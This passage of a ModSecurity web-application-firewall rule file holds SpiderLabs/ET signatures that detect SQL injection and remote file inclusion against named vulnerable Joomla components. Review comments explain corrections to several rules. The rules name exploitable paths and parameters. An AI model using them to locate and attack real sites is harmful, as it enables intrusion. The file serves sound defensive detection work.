Soundset Component \'cat_id\' Parameter DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010047) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Soundset Component 'cat_id' Parameter UNION SELECT SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_soundset" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010047,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Soundset Component \'cat_id\' Parameter UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36597/info'" SecRule REQUEST_LINE "@contains showcategory" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Soundset Component \'cat_id\' Parameter UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010048) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Soundset Component 'cat_id' Parameter INSERT INTO SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_soundset" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010048,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Soundset Component \'cat_id\' Parameter INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36597/info'" SecRule REQUEST_LINE "@contains showcategory" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! 
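Soundset Component \'cat_id\' Parameter INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2010260) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla AjaxChat Component ajcuser.php GLOBALS Parameter Remote File Inclusion Attempt
#
# Chain: the request line names ajcuser.php AND the value of the
# GLOBALS[mosConfig_absolute_path] argument starts with a remote scheme
# (http, https, ftp, ftps, php).
# The operator runs against the argument VALUE. The earlier pattern repeated
# the "GLOBALS[mosConfig_absolute_path] =" name prefix, so it could only match
# when the value itself contained the parameter name again. The pattern now
# tests the start of the value.
# NOTE(review): the t: list appears on the chain starter only; confirm which
# transformations reach the second link in your SecDefaultAction.
SecRule REQUEST_LINE "@contains /components/com_ajaxchat/tests/ajcuser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010260,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla AjaxChat Component ajcuser.php GLOBALS Parameter Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule ARGS:GLOBALS[mosConfig_absolute_path] "(?i:^\s*(?:https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla AjaxChat Component ajcuser.php GLOBALS Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# com_photoblog 'category' SQL injection signatures (2010349 - 2010353).
#
# Each chain: request line contains "GET ", request line contains
# "index.php?option=com_photoblog&", and the 'category' argument contains one
# SQL keyword pair (SELECT..FROM, DELETE..FROM, UNION..SELECT, INSERT..INTO,
# UPDATE..SET), matched case-insensitively.
# The last link used to select ARGS:&category, which names an argument
# literally called "&category". The "&" count prefix belongs in front of the
# collection (&ARGS:name) and yields a number, which is not what a content
# match needs. The selector is now ARGS:category in all five rules.
# NOTE(review): the chain requires GET and requires "option=com_photoblog" to
# be the first query parameter followed by "&"; confirm that this matches how
# the component is actually routed, or relax the first two links.

# (2010349) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter SELECT FROM SQL Injection Attempt
SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010349,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlaphotoblog-sql.txt'"
    SecRule REQUEST_LINE "@contains index.php?option=com_photoblog&" "chain"
    SecRule ARGS:category "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2010350) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter DELETE FROM SQL Injection Attempt
SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010350,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlaphotoblog-sql.txt'"
    SecRule REQUEST_LINE "@contains index.php?option=com_photoblog&" "chain"
    SecRule ARGS:category "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2010351) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UNION SELECT SQL Injection Attempt
SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010351,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlaphotoblog-sql.txt'"
    SecRule REQUEST_LINE "@contains index.php?option=com_photoblog&" "chain"
    SecRule ARGS:category "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2010352) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter INSERT INTO SQL Injection Attempt
SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010352,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlaphotoblog-sql.txt'"
    SecRule REQUEST_LINE "@contains index.php?option=com_photoblog&" "chain"
    SecRule ARGS:category "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2010353) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UPDATE SET SQL Injection Attempt
SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010353,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlaphotoblog-sql.txt'"
    SecRule REQUEST_LINE "@contains index.php?option=com_photoblog&" "chain"
    SecRule ARGS:category "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_photoblog component category Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2010474) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla eZine Component d4m_ajax_pagenav.php Remote File Inclusion Attempt
#
# Chain: the request line names d4m_ajax_pagenav.php, the request line
# contains "GET ", and the value of the GLOBALS[mosConfig_absolute_path]
# argument starts with a remote scheme (http, https, ftp, ftps, php).
# As in rule 2010260, the pattern is evaluated against the argument value, so
# the parameter-name prefix was removed from it.
# NOTE(review): ARGS also covers body parameters, but the "GET " link keeps
# this chain from firing on other methods; confirm that is intended.
SecRule REQUEST_LINE "@contains /components/com_ezine/class/php/d4m_ajax_pagenav.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010474,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla eZine Component d4m_ajax_pagenav.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37043'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:GLOBALS[mosConfig_absolute_path] "(?i:^\s*(?:https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla eZine Component d4m_ajax_pagenav.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2010476) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter SELECT FROM SQL Injection Attempt
# NOTE(review): the last link selects ARGS:&pid, the same selector form that
# was corrected to ARGS:category in the com_photoblog rules above. This rule
# continues past the text shown here, so it is left unchanged.
SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010476,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlajshop-sql.txt'"
    SecRule REQUEST_LINE "@contains index.php?option=com_jshop&" "chain"
    SecRule ARGS:&pid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter SELECT FROM SQL Injection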
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010477) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010477,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlajshop-sql.txt'" SecRule REQUEST_LINE "@contains index.php?option=com_jshop&" "chain" SecRule ARGS:&pid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010478) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010478,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlajshop-sql.txt'" SecRule REQUEST_LINE "@contains index.php?option=com_jshop&" "chain" SecRule ARGS:&pid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jshop pid Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010479) SpiderLabs Research (SLR) 
Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010479,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlajshop-sql.txt'" SecRule REQUEST_LINE "@contains index.php?option=com_jshop&" "chain" SecRule ARGS:&pid "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010480) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010480,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/joomlajshop-sql.txt'" SecRule REQUEST_LINE "@contains index.php?option=com_jshop&" "chain" SecRule ARGS:&pid "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jshop component pid Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010555) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter SELECT FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET 
" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010555,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37178'" SecRule REQUEST_LINE "@contains /index.php?option=com_joaktree&" "chain" SecRule REQUEST_LINE "@contains &view=joaktree" "chain" SecRule ARGS:treeId "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010556) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010556,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37178'" SecRule REQUEST_LINE "@contains /index.php?option=com_joaktree&" "chain" SecRule REQUEST_LINE "@contains &view=joaktree" "chain" SecRule ARGS:treeId "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010557) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010557,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37178'" SecRule REQUEST_LINE "@contains /index.php?option=com_joaktree&" "chain" SecRule REQUEST_LINE "@contains &view=joaktree" "chain" SecRule ARGS:treeId "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010558) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010558,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37178'" SecRule REQUEST_LINE "@contains /index.php?option=com_joaktree&" "chain" SecRule REQUEST_LINE "@contains &view=joaktree" "chain" SecRule ARGS:treeId "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010559) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " 
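"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010559,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37178'"
    SecRule REQUEST_LINE "@contains /index.php?option=com_joaktree&" "chain"
    SecRule REQUEST_LINE "@contains &view=joaktree" "chain"
    SecRule ARGS:treeId "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_joaktree Component treeId Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2010620) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Mamboleto Joomla component mamboleto.php Remote File Inclusion Attempt
#
# Two corrections in this chain:
#  - Path: the first link matched "/acomponents/com_mamboleto/mamboleto.php". The other
#    Joomla component rules in this file match under "/components/", so the leading "a"
#    looks like a transcription typo that kept the chain from starting.
#    NOTE(review): confirm against the upstream ET signature.
#  - Value check: ARGS:mosConfig_absolute_path is matched against the parameter VALUE
#    only, so a pattern that begins with "mosConfig_absolute_path=" could only match a
#    value that repeats the parameter name. The pattern now tests the value for a
#    leading http/https/ftp/ftps/php scheme.
SecRule REQUEST_LINE "@contains /components/com_mamboleto/mamboleto.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010620,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Mamboleto Joomla component mamboleto.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10369'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule ARGS:mosConfig_absolute_path "(?i:^\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Mamboleto Joomla component mamboleto.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# (2010636) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter SELECT FROM SQL Injection Attempt
SecRule REQUEST_LINE "@contains GET " 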
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010636,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter SELECT FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37279'" SecRule REQUEST_LINE "@contains /index.php?option=com_jphoto&" "chain" SecRule REQUEST_LINE "@contains view=category&" "chain" SecRule ARGS:Id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter SELECT FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010637) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter DELETE FROM SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010637,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter DELETE FROM SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37279'" SecRule REQUEST_LINE "@contains /index.php?option=com_jphoto&" "chain" SecRule REQUEST_LINE "@contains view=category&" "chain" SecRule ARGS:Id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter DELETE FROM SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010638) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UNION SELECT SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010638,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UNION SELECT SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37279'" SecRule REQUEST_LINE "@contains /index.php?option=com_jphoto&" "chain" SecRule REQUEST_LINE "@contains view=category&" "chain" SecRule ARGS:Id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UNION SELECT SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010639) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter INSERT INTO SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010639,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter INSERT INTO SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37279'" SecRule REQUEST_LINE "@contains /index.php?option=com_jphoto&" "chain" SecRule REQUEST_LINE "@contains view=category&" "chain" SecRule ARGS:Id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter INSERT INTO SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2010640) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains GET " 
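"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010640,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,37279'"
    SecRule REQUEST_LINE "@contains /index.php?option=com_jphoto&" "chain"
    SecRule REQUEST_LINE "@contains view=category&" "chain"
    SecRule ARGS:Id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla com_jphoto Component Id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'"

# mojoBlog remote-file-inclusion chains (2010659, 2010660).
# ARGS:mosConfig_absolute_path is matched against the parameter VALUE only, so a pattern
# that begins with "mosConfig_absolute_path=" could only match a value that repeats the
# parameter name. Both chains now test the value for a leading http/https/ftp/ftps/php
# scheme.

# (2010659) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-comments-post.php Remote File Inclusion Attempt
SecRule REQUEST_LINE "@contains /components/com_mojo/wp-comments-post.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010659,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla mojoBlog wp-comments-post.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,37179'"
    SecRule REQUEST_LINE "@contains GET " "chain"
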